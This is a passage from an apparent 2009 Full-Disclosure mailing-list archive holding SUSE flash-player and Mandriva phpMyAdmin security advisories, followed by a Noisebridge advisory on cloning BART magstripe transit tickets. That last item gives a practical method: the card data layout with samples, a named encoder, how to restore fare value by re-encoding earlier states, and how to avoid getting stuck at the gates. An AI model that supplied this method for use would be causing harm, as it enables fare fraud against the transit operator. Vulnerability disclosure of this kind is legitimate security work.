http://download.opensuse.org/update/10.3/rpm/i586/flash-player-9.0.159.0-0.1.i586.rpm Sources: openSUSE 11.1: http://download.opensuse.org/update/11.1/rpm/src/flash-player-10.0.22.87-0.1.1.src.rpm openSUSE 11.0: http://download.opensuse.org/update/11.0/rpm/src/flash-player-9.0.159.0-0.1.src.rpm openSUSE 10.3: http://download.opensuse.org/update/10.3/rpm/src/flash-player-9.0.159.0-0.1.src.rpm Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web: SLED 11 http://download.novell.com/index.jsp?search=Search&set_restricted=true&keywords=92b70d704f9216e04ab21e4e394c9329 http://download.novell.com/index.jsp?search=Search&set_restricted=true&keywords=114396a426b755abae95f7d91f8ba5b8 Novell Linux Desktop 9 http://download.novell.com/index.jsp?search=Search&set_restricted=true&keywords=526f8f83b86c20628b1912d0c53f6f5b SUSE Linux Enterprise Desktop 10 SP2 http://download.novell.com/index.jsp?search=Search&set_restricted=true&keywords=b16ec40efedece05ddf631e1fb265654 ______________________________________________________________________________ 5) Pending Vulnerabilities, Solutions, and Work-Arounds: none ______________________________________________________________________________ 6) Authenticity Verification and Additional Information - Announcement authenticity verification: SUSE security announcements are published via mailing lists and on Web sites. The authenticity and integrity of a SUSE security announcement is guaranteed by a cryptographic signature in each announcement. All SUSE security announcements are published with a valid signature. To verify the signature of the announcement, save it as text into a file and run the command gpg --verify replacing with the name of the file where you saved the announcement. The output for a valid signature looks like: gpg: Signature made using RSA key ID 3D25D3D9 gpg: Good signature from "SuSE Security Team " where is replaced by the date the document was signed. If the security team's key is not contained in your key ring, you can import it from the first installation CD. To import the key, use the command gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc - Package authenticity verification: SUSE update packages are available on many mirror FTP servers all over the world. While this service is considered valuable and important to the free and open source software community, the authenticity and the integrity of a package needs to be verified to ensure that it has not been tampered with. The internal rpm package signatures provide an easy way to verify the authenticity of an RPM package. Use the command rpm -v --checksig to verify the signature of the package, replacing with the filename of the RPM package downloaded. The package is unmodified if it contains a valid signature from build at suse.de with the key ID 9C800ACA. This key is automatically imported into the RPM database (on RPMv4-based distributions) and the gpg key ring of 'root' during installation. You can also find it on the first installation CD and at the end of this announcement. - SUSE runs two security mailing lists to which any interested party may subscribe: opensuse-security at opensuse.org - General Linux and SUSE security discussion. All SUSE security announcements are sent to this list. To subscribe, send an e-mail to . opensuse-security-announce at opensuse.org - SUSE's announce-only mailing list. Only SUSE's security announcements are sent to this list. To subscribe, send an e-mail to . ===================================================================== SUSE's security contact is or . The public key is listed below. ===================================================================== ______________________________________________________________________________ The information in this advisory may be distributed or reproduced, provided that the advisory is not modified in any way. In particular, the clear text signature should show proof of the authenticity of the text. SUSE Linux Products GmbH provides no warranties of any kind whatsoever with respect to the information contained in this security advisory. Type Bits/KeyID Date User ID pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.2 (GNU/Linux) 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 =ypVs - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQEVAwUBSnl7lXey5gA9JdPZAQIkcgf7BKz7XjuyGhXr95k4Mzs1W3r0UIF1ipS6 CGuqvVdfkAFltu51lnkjvbXUvVRqyJMA63fy0qme3Jns9pCaFRtgDOEpaSHEfdCk 0D9neCHJTrGrOrmEnjMjJES5I/aUma+XlkQ20VQ+qRrnMCC/ObSSmqNw3alCsBgn gCXnuns1wsjQ/ox6SiepsvWatXkSq9Jm5QyEwos4Tv3cOFe+oehdgH/Ie0aPmuyf rQv7uO+EBH/hcozX8kWTTzGV1aeNThC36z4hN+qXkkqnwYf88DMBety6USolTSXz S8Y3sDLBWE+AhUnu2OLXOU2ib1ZpRh7VK9uW0j6bjfSlf3e5VgeEBA== =zg3w -----END PGP SIGNATURE----- From thomas at suse.de Wed Aug 5 13:57:07 2009 From: thomas at suse.de (Thomas Biege) Date: Wed, 05 Aug 2009 14:57:07 +0200 Subject: [Full-disclosure] SUSE Security Announcement: flash-player (resent) (SUSE-SA:2009:041) Message-ID: <4a7981a3.teBb4+wJmq5OVfWB%thomas@suse.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ______________________________________________________________________________ SUSE Security Announcement Package: flash-player Announcement ID: SUSE-SA:2009:041 Date: Wed, 05 Aug 2009 14:00:00 +0000 Affected Products: openSUSE 10.3 openSUSE 11.0 openSUSE 11.1 Novell Linux Desktop 9 SUSE Linux Enterprise Desktop 10 SP2 SLED 11 Vulnerability Type: remote code execution Severity (1-10): 8 SUSE Default Package: yes Cross-References: CVE-2009-0901, CVE-2009-1862, CVE-2009-1863 CVE-2009-1864, CVE-2009-1865, CVE-2009-1866 CVE-2009-1867, CVE-2009-1868, CVE-2009-1869 CVE-2009-1870, CVE-2009-2395, CVE-2009-2493 Content of This Advisory: 1) Security Vulnerability Resolved: remote code execution Problem Description 2) Solution or Work-Around 3) Special Instructions and Notes 4) Package Location and Checksums 5) Pending Vulnerabilities, Solutions, and Work-Arounds: none 6) Authenticity Verification and Additional Information ______________________________________________________________________________ 1) Problem Description and Brief Discussion Note: This advisory was resent because the list of packages was wrong. The flash-player is a web-browser plugin that allows displaying animated web-content and remote access to client hardware (mic, web-cam, etc.). A specially crafted Shockwave-Flash (SWF) file could cause a buffer overflow in the flash-player plugin. This buffer overflow can probably be exploited to execute arbitrary code remotely. 2) Solution or Work-Around No work-around, please update. 3) Special Instructions and Notes Please restart your web-browser after the update. 4) Package Location and Checksums The preferred method for installing security updates is to use the YaST Online Update (YOU) tool. YOU detects which updates are required and automatically performs the necessary steps to verify and install them. Alternatively, download the update packages for your distribution manually and verify their integrity by the methods listed in Section 6 of this announcement. Then install the packages using the command rpm -Fhv to apply the update, replacing with the filename of the downloaded RPM package. x86 Platform: openSUSE 11.1: http://download.opensuse.org/update/11.1/rpm/i586/flash-player-10.0.32.18-0.1.1.i586.rpm openSUSE 11.0: http://download.opensuse.org/update/11.0/rpm/i586/flash-player-9.0.246.0-0.1.i586.rpm openSUSE 10.3: http://download.opensuse.org/update/10.3/rpm/i586/flash-player-9.0.246.0-0.1.i586.rpm Sources: openSUSE 11.1: http://download.opensuse.org/update/11.1/rpm/src/flash-player-10.0.32.18-0.1.1.src.rpm openSUSE 11.0: http://download.opensuse.org/update/11.0/rpm/src/flash-player-9.0.246.0-0.1.src.rpm openSUSE 10.3: http://download.opensuse.org/update/10.3/rpm/src/flash-player-9.0.246.0-0.1.src.rpm Our maintenance customers are notified individually. The packages are offered for installation from the maintenance web: Novell Linux Desktop 9 http://download.novell.com/index.jsp?search=Search&set_restricted=true&keywords=8195fce564597b5b4b13febd70c26995 SUSE Linux Enterprise Desktop 10 SP2 http://download.novell.com/index.jsp?search=Search&set_restricted=true&keywords=4392ce749c7a07414dd32e14ff0d23a0 SLED 11 http://download.novell.com/index.jsp?search=Search&set_restricted=true&keywords=0ed97f904ab5337b5e08c83e789c22d2 ______________________________________________________________________________ 5) Pending Vulnerabilities, Solutions, and Work-Arounds: none ______________________________________________________________________________ 6) Authenticity Verification and Additional Information - Announcement authenticity verification: SUSE security announcements are published via mailing lists and on Web sites. The authenticity and integrity of a SUSE security announcement is guaranteed by a cryptographic signature in each announcement. All SUSE security announcements are published with a valid signature. To verify the signature of the announcement, save it as text into a file and run the command gpg --verify replacing with the name of the file where you saved the announcement. The output for a valid signature looks like: gpg: Signature made using RSA key ID 3D25D3D9 gpg: Good signature from "SuSE Security Team " where is replaced by the date the document was signed. If the security team's key is not contained in your key ring, you can import it from the first installation CD. To import the key, use the command gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc - Package authenticity verification: SUSE update packages are available on many mirror FTP servers all over the world. While this service is considered valuable and important to the free and open source software community, the authenticity and the integrity of a package needs to be verified to ensure that it has not been tampered with. The internal rpm package signatures provide an easy way to verify the authenticity of an RPM package. Use the command rpm -v --checksig to verify the signature of the package, replacing with the filename of the RPM package downloaded. The package is unmodified if it contains a valid signature from build at suse.de with the key ID 9C800ACA. This key is automatically imported into the RPM database (on RPMv4-based distributions) and the gpg key ring of 'root' during installation. You can also find it on the first installation CD and at the end of this announcement. - SUSE runs two security mailing lists to which any interested party may subscribe: opensuse-security at opensuse.org - General Linux and SUSE security discussion. All SUSE security announcements are sent to this list. To subscribe, send an e-mail to . opensuse-security-announce at opensuse.org - SUSE's announce-only mailing list. Only SUSE's security announcements are sent to this list. To subscribe, send an e-mail to . ===================================================================== SUSE's security contact is or . The public key is listed below. ===================================================================== ______________________________________________________________________________ The information in this advisory may be distributed or reproduced, provided that the advisory is not modified in any way. In particular, the clear text signature should show proof of the authenticity of the text. SUSE Linux Products GmbH provides no warranties of any kind whatsoever with respect to the information contained in this security advisory. Type Bits/KeyID Date User ID pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.2 (GNU/Linux) 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 =ypVs - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQEVAwUBSnmA+ney5gA9JdPZAQJzrwf+LhM0dgMHW5XSa/lHKuOktn1GpKspksQl J6v+RjH/Al8ID3aFaGXEOPhkYfN4AQKGkANzgAE92C7H5XqE4+YCPfSGMoHKmwoI dQaJKmwypHZd5SFKxnchk0DOiDFeXHZHuq39YaC7KzQqapykte7wYzL4Qbbg33Vo BMrKI47srVOStzuJpsgkP0Q8dU++Mli06fs/uNuDPQdHi8ItBHDsL7HhwI2SF/4s 3TyCXZB6aacLZQrMeUg1dmSpRWD6dA1nxQj2NwUnX/XZf7aMZuNLFsVg09WPQAIp px0GX0fck52EgYyyvMgNcYgokcMi1eIx4CIiAePMEdAG6tdT4lXtTw== =LlIb -----END PGP SIGNATURE----- From security at mandriva.com Wed Aug 5 15:07:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Wed, 05 Aug 2009 16:07:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:192 ] phpmyadmin Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:192 http://www.mandriva.com/security/ _______________________________________________________________________ Package : phpmyadmin Date : August 5, 2009 Affected: Enterprise Server 5.0 _______________________________________________________________________ Problem Description: A vulnerability has been identified and corrected in phpMyAdmin: Cross-site scripting (XSS) vulnerability in phpMyAdmin before 3.2.0.1 allows remote attackers to inject arbitrary web script or HTML via a crafted SQL bookmark (CVE-2009-2284). This update provides phpmyadmin 3.2.0.1, which is not vulnerable to this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2284 http://www.phpmyadmin.net/home_page/security/PMASA-2009-5.php _______________________________________________________________________ Updated Packages: Mandriva Enterprise Server 5: f29809a79beba8e06d6b7a6bc6409353 mes5/i586/phpmyadmin-3.2.0.1-0.1mdvmes5.noarch.rpm b2f1d2938a0fa4dab143b9063ec2d74c mes5/SRPMS/phpmyadmin-3.2.0.1-0.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: d9e0b8c4fe67650e27252726868f2b59 mes5/x86_64/phpmyadmin-3.2.0.1-0.1mdvmes5.noarch.rpm b2f1d2938a0fa4dab143b9063ec2d74c mes5/SRPMS/phpmyadmin-3.2.0.1-0.1mdvmes5.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKeWftmqjQ0CJFipgRAvOQAKCrogXLKp+s2LPqv2MuXn1O86iDRgCgiy6G zYab/RiPSy/KM6RMB7wI+hc= =7eeg -----END PGP SIGNATURE----- From noisebridge at hushmail.com Wed Aug 5 17:24:11 2009 From: noisebridge at hushmail.com (noisebridge at hushmail.com) Date: Wed, 05 Aug 2009 16:24:11 +0000 Subject: [Full-disclosure] BART Card Advisory Message-ID: <20090805162411.7419EB805A@smtp.hushmail.com> www.noisebridge.net -= Security Advisory =- Advisory: BART Tickets vulnerable to simple cloning Release Date: 2008/07/14 Author: Jacob Appelbaum Application: Bay Area Rapid Transit System (BART) Severity: All BART blue high-value tickets magstripe encoded tickets are vulnerable to cloning. Risk: Medium/High Vendor Status: Vendor has not been contacted "If you only read the books that everyone else is reading, you can only think what everyone else is thinking." -- Haruki Murakami Overview: Quote from www.bart.gov/tickets/ BART tickets are like debit cards with stored value. All BART stations have automatic ticket vending machines that accept nickels, dimes, quarters and $1 coins, as well as $1 $5, $10 and $20 bills. You can also use credit and debit cards in select machines. When you enter BART, insert your ticket into the fare gate and it will be returned to you. Use the same ticket when you exit. The correct fare will be automatically deducted and tickets with remaining value will be returned. If your ticket has too little value, a sign on the fare gate will read "Underpaid: Go to Addfare." A nearby Addfare vending machine will tell you how much additional fare you must add to your ticket to exit the BART system. It turns out that BART high value (blue) tickets and other magstripe BART tickets store value ON TICKET, as opposed to centrally via an authentication token. Critical information is stored directly on card using what is probably a simple block cipher and is vulnerable to a basic replay attack. In our analysis though, we have found that just like the SFMTA parking meter smartcard system, the signature goes UNVALIDATED. It seems theres a pattern here in the security systems of San Francisco public services! Hmmmm. This type of vulnerability does not extend to the new BART EZ Rider smart cards. (Applause) Track 2 Layout | SS | PAN | FS | Additional Data | ES | LRC | SS=Start Sentinel ";" PAN=Primary Acct. # (19 digits max) FS=Field Separator "=" Additional Data=Expiration Date, offset, encrypted PIN, etc. ES=End Sentinel "?" LRC=Longitudinal Redundancy Check In the ABA Track 2 system, the magic happens in the "Additional Data" area. Depending on bank (some remained completely unencrypted until mid 2000s!) the PIN numbers were actually stored on card only encrypted by a simple block cipher! Well it turns out the BART ticketing system, although not similar in format, does use the same general encoding format, 75bpi BCD which means you can take your standard off-the-shelf MSR-206 magstripe encoder/decoder and go! Fortunately for you, we've even provided this handy utility! http://code.google.com/p/libmsr/ This project is an independent Free Software implementation of the protocol for the MSR 206 magnetic stripe reader/writer. It is intended to be both a library for use in other programs that wish to interface with the MSR 206 and as a collection of useful user space programs. So onto the data. Bart Card Layout: | SET | VERSION | ID | DATA | VALUE | CRC | . set(?) . card id .- plain text value / / / 084909 5346 00721486 8432187913029 00405 1610 084909 5346 00721486 2072730117332 00065 2287 \ \ \ - version(?) \ `- CRC(?) `- data Set: Seems to be related to the ID but changes infrequently and doesnt seem to increment linearly. Version: This number seems to change infrequently but from time to time even for the same type of card (blue/red/green) ID: Card ID, which seems to be issued semi-sequentially Data: Most likely the encrypted version of value Value: Dollar value ($000.00) CRC: Possibly the checksum Although, as you can see, a plain-text BCD card value is stored on the stripe it is not the only data used to determine the on-card value. By our simple analysis (i.e. trying to encode other dollar figures in plaintext) It's clear that the plain text value in conjunction with the data field is used to validate the on-card value. We assume that the 4-digit value after the plain text value is the CRC, because this also changes each time its used, it's kinda small and it just seems like one (great evidence, huh!). In truth black-box differntial analysis of the magstripe data is relatively uninformational, but it turns out if we follow these this simple rule, we can effectively clone and use BART cards without any real brains. Don't use two clones of the same card at the same time. Anyone whos tried using a Fast Pass twice will realize they will be let in twice, but not let out twice. You'll end up stuck. Other than than, just copy the card and once in a while, reset the data back to a higher value by re-encoding a previous state. Anyways, if anyone wants to come join us at Noisebridge to clone some BART cards for fun and profit just swing by 83C Wiese Street with your extra cards (you know, the ones with a nickle on them). Also, if you would like to donate to the Noisebridge cause (and now an official 501(c)(3) non-profit corporation) we might be able to throw in a BART pass at twice the donation value! Just kidding, but hey, they're definately tax deductable and for a good cause ;) Regards, Jacob Appelbaum From security at mandriva.com Thu 